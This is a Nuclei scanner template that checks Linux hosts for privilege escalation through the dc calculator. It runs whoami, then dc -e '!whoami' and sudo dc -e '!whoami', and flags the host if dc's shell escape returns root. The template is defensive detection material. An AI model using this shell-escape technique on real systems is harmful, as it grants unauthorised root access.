id: privesc-dc

info:
  name: dc - Privilege Escalation
  author: daffainfo
  severity: high
  description: |
    dc is a command-line calculator in Unix and Unix-like operating systems. It uses reverse Polish notation (RPN) and provides a simple and efficient way to perform arithmetic operations from the command line. It can be used for basic and advanced mathematical calculations, making it a handy tool for scripting and quick calculations in the terminal.
  reference:
    - https://gtfobins.github.io/gtfobins/dc/
  metadata:
    verified: true
    max-request: 3
  tags: code,linux,dc,privesc

self-contained: true
code:
  - engine:
      - sh
      - bash
    source: |
      whoami

  - engine:
      - sh
      - bash
    source: |
      dc -e '!whoami'

  - engine:
      - sh
      - bash
    source: |
      sudo dc -e '!whoami'

    matchers-condition: and
    matchers:
      - type: word
        part: code_1_response
        words:
          - "root"
        negative: true

      - type: dsl
        dsl:
          - 'contains(code_2_response, "root")'
          - 'contains(code_3_response, "root")'
        condition: or
# digest: 4a0a00473045022100d1f9c547a35ca7468043d1b424ba23357a3cf914143ed2c58757840ce6b37e33022027dfff918a0068d21ba18f1f067780362ecd78c0f87c880347c4b5c6921b27a7:922c64590222798bb761d5b6d8e72950